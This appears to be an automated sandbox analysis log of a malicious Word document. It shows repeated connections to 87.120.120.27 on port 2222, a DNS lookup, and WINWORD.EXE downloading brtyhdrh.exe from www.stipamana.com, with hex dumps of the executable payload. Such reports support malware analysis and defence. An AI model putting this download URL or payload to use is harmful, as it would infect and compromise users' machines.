                                  Dec 6, 2024 10:30:35.528620005 CET491712222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:35.636281967 CET491722222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:35.756083012 CET22224917287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:35.756305933 CET491722222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:37.884517908 CET22224917287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:37.884598970 CET491722222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:37.992218971 CET491732222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:38.112054110 CET22224917387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:38.112245083 CET491732222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:40.263077974 CET22224917387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:40.263220072 CET491732222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:40.378953934 CET491742222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:40.498853922 CET22224917487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:40.499018908 CET491742222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:42.619723082 CET22224917487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:42.619837046 CET491742222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:42.734298944 CET491752222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:42.854168892 CET22224917587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:42.854232073 CET491752222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:45.001750946 CET22224917587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:45.001822948 CET491752222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:45.105541945 CET491762222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:45.225276947 CET22224917687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:45.225344896 CET491762222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:47.373083115 CET22224917687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:47.373147964 CET491762222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:47.492444992 CET491772222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:47.612354040 CET22224917787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:47.612441063 CET491772222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:49.745306015 CET22224917787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:49.745440960 CET491772222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:49.848084927 CET491782222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:49.968323946 CET22224917887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:49.968441963 CET491782222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:52.123068094 CET22224917887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:52.123373032 CET491782222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:52.219454050 CET491792222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:52.339320898 CET22224917987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:52.339389086 CET491792222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:54.482114077 CET22224917987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:54.482173920 CET491792222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:54.590691090 CET491802222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:54.710760117 CET22224918087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:54.710834026 CET491802222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:56.853899002 CET22224918087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:56.854002953 CET491802222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:56.961905003 CET491812222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:57.081898928 CET22224918187.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:57.082175970 CET491812222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:59.251535892 CET22224918187.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:59.251658916 CET491812222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:59.348725080 CET491822222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:59.468770027 CET22224918287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:59.468863964 CET491822222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:01.603691101 CET22224918287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:01.603770971 CET491822222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:01.704330921 CET491832222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:01.824503899 CET22224918387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:01.824642897 CET491832222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:04.029329062 CET22224918387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:04.029441118 CET491832222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:04.137763977 CET491842222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:04.257639885 CET22224918487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:04.257788897 CET491842222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:06.404369116 CET22224918487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:06.404455900 CET491842222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:06.508944035 CET491852222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:06.628890038 CET22224918587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:06.629004955 CET491852222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:08.779575109 CET22224918587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:08.779638052 CET491852222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:08.880544901 CET491862222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:09.000459909 CET22224918687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:09.000680923 CET491862222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:11.135256052 CET22224918687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:11.135494947 CET491862222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:11.235912085 CET491872222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:11.356010914 CET22224918787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:11.356200933 CET491872222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:13.479176044 CET22224918787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:13.479338884 CET491872222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:13.575854063 CET491882222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:13.695636034 CET22224918887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:13.695779085 CET491882222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:15.843219042 CET22224918887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:15.843339920 CET491882222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:15.947093964 CET491892222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:16.066953897 CET22224918987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:16.067073107 CET491892222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:18.216980934 CET22224918987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:18.217086077 CET491892222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:18.333887100 CET491902222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:18.453886986 CET22224919087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:18.454000950 CET491902222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:20.607685089 CET22224919087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:20.607863903 CET491902222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:20.705029964 CET491912222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:20.825016022 CET22224919187.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:20.825119019 CET491912222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:22.967046022 CET22224919187.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:22.967102051 CET491912222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:23.091790915 CET491922222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:23.212181091 CET22224919287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:23.212277889 CET491922222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:25.358503103 CET22224919287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:25.358577967 CET491922222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:25.463061094 CET491932222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:25.583136082 CET22224919387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:25.583264112 CET491932222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:27.793695927 CET22224919387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:27.793808937 CET491932222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:27.924200058 CET491942222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:28.044593096 CET22224919487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:28.044737101 CET491942222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:30.236284971 CET22224919487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:30.236428976 CET491942222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:30.361696005 CET491952222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:30.481657982 CET22224919587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:30.485517025 CET491952222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:32.675945044 CET22224919587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:32.676043034 CET491952222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:32.779937029 CET491962222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:32.899988890 CET22224919687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:32.900196075 CET491962222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:35.182631969 CET22224919687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:35.182854891 CET491962222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:35.291296005 CET491972222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:35.411422968 CET22224919787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:35.411505938 CET491972222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:37.562814951 CET22224919787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:37.562958956 CET491972222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:37.678250074 CET491982222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:37.798269987 CET22224919887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:37.798357964 CET491982222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:39.936031103 CET22224919887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:39.936108112 CET491982222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:40.033996105 CET491992222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:40.153908968 CET22224919987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:40.154066086 CET491992222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:42.276604891 CET22224919987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:42.276753902 CET491992222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:42.389735937 CET492002222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:42.509955883 CET22224920087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:42.510088921 CET492002222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:44.636133909 CET22224920087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:44.636418104 CET492002222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:44.745377064 CET492012222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:44.865577936 CET22224920187.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:44.865715027 CET492012222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:47.014645100 CET22224920187.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:47.014772892 CET492012222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:47.116091013 CET492022222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:47.235888958 CET22224920287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:47.235995054 CET492022222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:50.265067101 CET22224920287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:50.265178919 CET492022222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:50.361316919 CET492032222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:50.482228041 CET22224920387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:50.482315063 CET492032222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:52.624449015 CET22224920387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:52.624599934 CET492032222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:52.732223034 CET492042222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:31:52.852113962 CET22224920487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:31:52.852224112 CET492042222192.168.2.2287.120.120.27
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 6, 2024 10:29:47.731921911 CET5456253192.168.2.228.8.8.8
                                  Dec 6, 2024 10:29:48.102530956 CET53545628.8.8.8192.168.2.22
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 6, 2024 10:29:47.731921911 CET192.168.2.228.8.8.80xf38dStandard query (0)www.stipamana.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 6, 2024 10:29:48.102530956 CET8.8.8.8192.168.2.220xf38dNo error (0)www.stipamana.com87.121.86.205A (IP address)IN (0x0001)false
                                  • www.stipamana.com
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.224916187.121.86.2054433556C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-12-06 09:29:49 UTC422OUTGET /sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: www.stipamana.com
                                  Connection: Keep-Alive
                                  2024-12-06 09:29:50 UTC320INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 06 Dec 2024 09:29:50 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 169984
                                  Last-Modified: Fri, 06 Dec 2024 06:41:07 GMT
                                  Connection: close
                                  ETag: "67529c83-29800"
                                  Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                  Cache-Control: max-age=315360000
                                  Accept-Ranges: bytes
                                  2024-12-06 09:29:50 UTC16064INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 83 9c 52 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 80 02 00 00 16 00 00 00 00 00 00 ae 9e 02 00 00 20 00 00 00 a0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELRg @ `
                                  2024-12-06 09:29:50 UTC16384INData Raw: 90 16 c9 b5 ec 33 5f 65 51 0b 52 6e 8a 3b fb d5 c2 51 62 34 54 b8 8c d9 19 8b 10 97 e0 7e bd 7e 1b 30 60 d2 38 5a 9a f7 7d 2d a6 aa 1e 01 c4 c7 c3 f6 85 95 0d 3f 9b 57 21 d4 d7 bd b1 a7 fe fe b4 30 77 65 11 5d 5c 3e bb 8c 0c 4b 52 15 ef a4 e9 4d fc 48 be ac dd 49 6a 90 a2 da c5 6e ea 63 f6 c8 36 8b e9 4d 3c 06 50 91 d8 12 1c 09 2e 44 96 6d de 8a 8c 72 7f 9a 21 4a 92 58 fc 31 06 f2 66 00 40 0a 39 e3 a7 80 e9 6c f5 76 1a a0 8f 7c f2 8a e2 5d cc 9c 9f aa 40 cc a8 c3 ce b6 14 90 9d 1a 61 22 38 52 4a fa 92 96 81 69 c6 39 28 82 6d ca f9 8e 40 d6 84 fd c4 6b 5c 1b d4 a8 00 63 e0 4c 2f df 1c f8 c0 6b be 7b 80 0d 53 44 da 8e 46 41 c2 0a 4d fe b5 fd d1 8d e2 b5 e0 9b 2a 7e 8e c7 60 85 21 44 ce a9 a7 95 19 fe b8 d2 87 b1 6d fd 7d 06 1c 9a de 2a 24 61 4b f4 68 41 97
                                  Data Ascii: 3_eQRn;Qb4T~~0`8Z}-?W!0we]\>KRMHIjnc6M<P.Dmr!JX1f@9lv|]@a"8RJi9(m@k\cL/k{SDFAM*~`!Dm}*$aKhA
                                  2024-12-06 09:29:50 UTC16384INData Raw: 8a 3e 10 db 22 ec ed 05 77 83 58 50 9e 1b eb 65 a2 89 22 b5 7e a2 28 e9 07 21 e7 38 1f 7b ee a1 48 c5 d3 4b 18 80 8b a8 b8 9c 76 e7 54 02 15 bc 6a e4 20 48 90 23 c3 c0 f7 93 9f ef e1 b0 b1 53 9a e5 39 ee 93 7d 81 4e 7c 14 f6 1d a6 7a 08 78 bd c6 4a 12 84 6d 69 d3 4e d6 1e ae 16 fe f0 74 0a 68 ea 4f 1b c3 a8 1d 81 8c 61 ab 58 0b 61 b1 92 bb 6c 61 c8 8a 2c 99 fe ac f3 f4 c4 35 e1 90 df e7 cb 1d c0 88 a6 74 39 a3 a2 56 33 27 bb 8a b1 b6 c4 d5 15 3e ad cb cc 70 3e 80 d2 f6 bd 8e a4 68 3b 38 49 a0 55 fe b2 b5 69 28 b0 07 e8 2c 69 1e 70 f5 c3 f3 1a bd 3f 07 1e 90 34 98 bc f1 b5 70 23 ea 0a c8 7d 87 13 09 ae b3 ae 27 0f 6c 96 8a c1 02 5b fd 2b 9f 7b 4c 81 d2 84 4b 59 0b 2f ed c7 b8 5f 5e b6 56 4d 64 05 6b 79 bd e1 18 25 4c 9d ff 2e 0e 0d 68 30 07 39 a6 68 20 9a
                                  Data Ascii: >"wXPe"~(!8{HKvTj H#S9}N|zxJmiNthOaXala,5t9V3'>p>h;8IUi(,ip?4p#}'l[+{LKY/_^VMdky%L.h09h
                                  2024-12-06 09:29:50 UTC16384INData Raw: 6c ca d7 48 60 f7 2b 81 23 2e d4 3e 37 c5 68 36 d8 ae d3 c7 b8 24 1d 17 78 02 23 ca b8 17 2f 49 89 8b a8 7e 18 0e 26 32 12 47 9b 1c 02 cd bf 27 e4 0b 10 8f c6 ec a0 29 61 d9 71 77 7e a1 ea 10 6b 20 60 10 a8 93 99 8d ea 92 b5 99 26 e4 04 f1 94 72 63 b7 45 5f b8 f2 1d be 80 3a bf 26 78 f7 b8 b2 f3 82 32 63 79 c1 cf 65 27 18 cb a0 16 39 51 96 52 5d 94 94 84 d5 21 d3 0d 1b 5b 1a 0b 8f de d6 c9 72 28 ec 7c 7e c4 43 3d 52 6f b1 3c a6 85 e8 6a a6 d4 b8 51 71 95 a8 51 57 fa 75 12 2e fb 27 fe a7 05 6c ea 89 2b 14 19 0f f5 81 f6 41 3d aa d4 b5 ec 74 5f f1 54 bc 62 a3 ee 05 e0 31 7b 89 17 bc f8 d3 f1 df c8 7f 6a 19 14 6c 55 03 8c 47 42 27 bd 8f ae 17 5f b6 b3 87 75 65 bc 1f 6b 53 d9 60 cc 11 82 57 bd 92 8b 3b 5a e5 bd bf 59 5e 29 fd ee 63 22 53 33 55 fb bc 4a 15 69
                                  Data Ascii: lH`+#.>7h6$x#/I~&2G')aqw~k `&rcE_:&x2cye'9QR]![r(|~C=Ro<jQqQWu.'l+A=t_Tb1{jlUGB'_uekS`W;ZY^)c"S3UJi
                                  2024-12-06 09:29:50 UTC16384INData Raw: 0d ee 66 58 aa d4 1b 3f 56 b2 bc 65 a5 f6 a5 22 d6 dd cb 30 d0 47 6e 79 1d f4 cf 31 ca 3c c9 6c b9 bf 29 f4 ec e2 c6 70 2f 29 49 02 51 51 aa 43 9a 58 0d 08 72 c0 69 99 a7 85 12 cb ba 21 fb 8e 57 1e 3e 34 bf 2c b7 f2 78 fa e6 31 ce 5a 82 f6 db 5d 43 f3 40 ec 0a 90 29 00 0c 1d 15 de ba ba 87 a7 62 2e 76 54 2b 37 82 09 0b ea 0e ed 30 90 f3 f6 37 d7 66 0a 60 b5 03 8a a8 4b d7 49 58 29 e5 ea 85 e1 70 f6 ed 9c f7 a4 86 a2 fe 4f 2c ca 76 ed 11 e0 56 26 45 60 df cc 10 fa 49 83 c7 36 ce 33 aa 00 b5 c8 03 78 d2 6e cb d9 23 46 e4 1d 11 d5 05 c3 c5 7b f0 48 c8 96 31 62 ee 88 7d 6b e0 8a 3e ba 1a 35 2d 06 f1 c4 75 da b7 92 9a 8f 38 bb 28 f7 8d 18 44 24 22 49 9d e4 42 44 dc 72 2b 04 f1 31 35 e7 e1 58 78 91 30 60 d6 37 fd cc ed a0 4f b0 69 0a 6f 6f 38 f5 43 bf 01 81 8a
                                  Data Ascii: fX?Ve"0Gny1<l)p/)IQQCXri!W>4,x1Z]C@)b.vT+707f`KIX)pO,vV&E`I63xn#F{H1b}k>5-u8(D$"IBDr+15Xx0`7Oioo8C
                                  2024-12-06 09:29:50 UTC16384INData Raw: ef a4 57 f8 f2 05 eb 26 a2 d8 b1 13 be 0a 17 8d 39 6d d8 af 8c 65 06 54 c4 81 84 f1 ac 45 62 ec 5a 1e c7 35 d4 e1 f5 b0 b5 21 f8 d9 5a 8d 99 88 2d 92 a6 31 bd 31 20 de b4 ed a1 48 9a 4e 61 46 f0 43 de cf 44 19 e0 42 73 97 3d 4a aa 03 c7 62 0a 68 d8 dd cc 8a d7 64 a4 bc a7 00 d5 d2 8e 8f ee 99 4b ae df c1 7c bb 64 c4 16 39 30 14 f1 8a 0d e9 55 6e 46 b5 4e b7 45 b8 7c fb b7 5a 6f 30 20 64 1b 65 ad ba 92 29 f2 89 69 15 76 67 ca 9a 77 d4 db 96 2a cc eb d4 d7 a5 81 d9 c8 7f 8f 15 ca 33 6e a9 95 b1 e3 56 93 e6 ae 97 5c b9 33 fe d9 7b 71 63 66 08 2e a9 5e 31 d3 ef f3 df 5c e6 c2 f8 a3 d6 d6 ce 77 6e ca b9 18 1c f5 a4 0e 58 73 51 c9 17 30 22 23 d9 cd 18 09 4e cc c5 04 ec 52 3d b8 1e e3 66 55 ad 5f 9c 9e 3e e0 7e 7c 95 57 f0 ac 3a 63 2a 7a f4 75 73 4c 14 3f 82 33
                                  Data Ascii: W&9meTEbZ5!Z-11 HNaFCDBs=JbhdK|d90UnFNE|Zo0 de)ivgw*3nV\3{qcf.^1\wnXsQ0"#NR=fU_>~|W:c*zusL?3
                                  2024-12-06 09:29:50 UTC16384INData Raw: 5a 2e f9 3a ea 8e 7d 93 e2 bc 71 78 77 6f e0 5d 90 96 97 eb 7c bf 41 fc d0 a8 75 e4 d5 ee 5c fd 6f 3d 54 79 06 80 27 d7 9c 07 b3 25 03 a0 2c 33 40 57 33 aa 2f 00 c3 b4 c3 83 c1 0d 7a 68 0b ba 84 ba 36 5e 00 e5 91 b5 cf bb fa 80 9b 20 4c 6e e7 eb ab eb 02 98 d4 6d 9c b0 7e bc a9 52 b7 65 b1 59 cf 9c d0 87 00 6c d7 cd f9 91 32 4f 2b a8 81 db d6 d0 92 dd 4f 40 f9 52 fd e1 28 e4 23 68 e5 7b 3f df 60 50 34 36 45 87 e5 63 05 f5 6d 12 8c 2f 1d 3b 1d d4 a9 04 81 96 e7 e8 c4 1d c9 db 2f f0 1d b1 83 90 6a 75 eb de 17 0a f9 b8 aa b0 b0 e8 11 52 1d be af d1 c6 ca 47 da 44 7f 3d f2 90 6c c0 02 53 91 2b d9 1f f8 30 7d 95 2c b5 26 87 7d 2b c0 b3 38 1a fa ff 0c e5 2b 10 2a be b2 ff dd b7 9e 92 7d 54 18 91 7b 82 7a 74 41 73 70 45 1f b1 73 f4 9f 6b 0d 72 6a 9f e7 67 f5 26
                                  Data Ascii: Z.:}qxwo]|Au\o=Ty'%,3@W3/zh6^ Lnm~ReYl2O+O@R(#h{?`P46Ecm/;/juRGD=lS+0},&}+8+*}T{ztAspEskrjg&
                                  2024-12-06 09:29:50 UTC16384INData Raw: 66 96 29 a8 88 77 da e8 ec 7b 33 a1 21 44 f6 bf 25 08 8a ab d3 7d b0 af 65 d3 0b 24 e5 83 84 df 31 50 d7 b9 8c de 01 73 47 6e 9c 8f 41 e5 89 63 5f 76 2d 54 1f 9e 48 2b f8 fb 48 32 18 ba b2 d0 60 82 2c 1c 07 a0 a5 4f d8 2b 0e a7 1a 75 0e 72 52 c9 d7 46 28 f6 cc ee 77 33 86 44 64 09 19 fb c6 bc eb 0d c2 c0 bb 8d ee 62 d5 af bb 22 1d 39 23 eb 2c 8f 94 8b 18 bf a5 12 3e f3 66 9d e5 de 57 89 2f c5 82 35 40 f0 f0 8b 9e a5 a8 5c e7 4a 03 f7 89 ef 69 4a 43 23 20 36 48 ff 5e 90 7e 23 90 fa ba 89 9c bd 3c a1 2a 2e 4f c4 ae 18 2a 9f ff 44 7a 75 cc de 72 bd e3 9b 2b c4 6c e6 b0 85 c1 da b7 fc 6a 2b 11 da 3e e2 3b df 2e 9c a7 fe e3 79 14 e5 67 a1 09 84 68 3a 4f e8 dd 78 6f ea f8 e6 f6 77 9a 19 eb 78 7a f1 6e 89 5a 1b c9 75 be e8 00 8e 25 8b c3 1f c3 e9 51 fd 35 84 b2
                                  Data Ascii: f)w{3!D%}e$1PsGnAc_v-TH+H2`,O+urRF(w3Ddb"9#,>fW/5@\JiJC# 6H^~#<*.O*Dzur+lj+>;.ygh:OxowxznZu%Q5
                                  2024-12-06 09:29:50 UTC16384INData Raw: 49 18 c0 b7 51 7b ae e9 b2 5e c0 a9 d7 8d 7d 7a 3f 58 d2 f4 b3 7b 1f 75 f6 af d2 dc 8b 1a 6c a2 be 2d bb af a6 e6 e5 db 4c bf b3 02 6b 26 39 4f 29 32 8b e8 30 f7 79 54 18 0b 0d 54 4c 31 a4 bd 89 7b 8e ab 66 fb 3d ad 2b 76 03 f5 14 1b 0c 3f dd 6d c4 3b e5 ba ef 5c 6e 15 9a 00 07 b2 3e ab 62 66 51 4f 57 74 54 2b c5 61 a9 27 2d 6b d4 5d eb b7 39 81 53 b9 ca 64 e1 1b 88 99 e1 84 b3 b5 be 1d fe 7b 84 63 68 59 35 1c fa 4e 51 14 ba 22 8f 4e a8 9a a7 47 b8 92 3e 01 76 1a 53 18 32 32 d9 fb 4d 3f 78 1c 60 62 fd 39 44 96 e2 83 64 75 38 89 f6 92 e8 3b 94 d9 74 87 be f8 b0 27 b0 61 ca 70 fa 56 78 3a 1c dd 06 f6 3e 5c a5 fd 33 24 6f 70 6d 61 08 33 ca b9 7f eb bd b9 2a 94 aa bb fe b7 ae b1 cb cf 1c c5 8a b2 0d aa 2b 8e 8b 02 2d 94 87 d1 c9 0f 20 47 1d 07 9f 9b cd 27 34
                                  Data Ascii: IQ{^}z?X{ul-Lk&9O)20yTTL1{f=+v?m;\n>bfQOWtT+a'-k]9Sd{chY5NQ"NG>vS22M?x`b9Ddu8;t'apVx:>\3$opma3*+- G'4
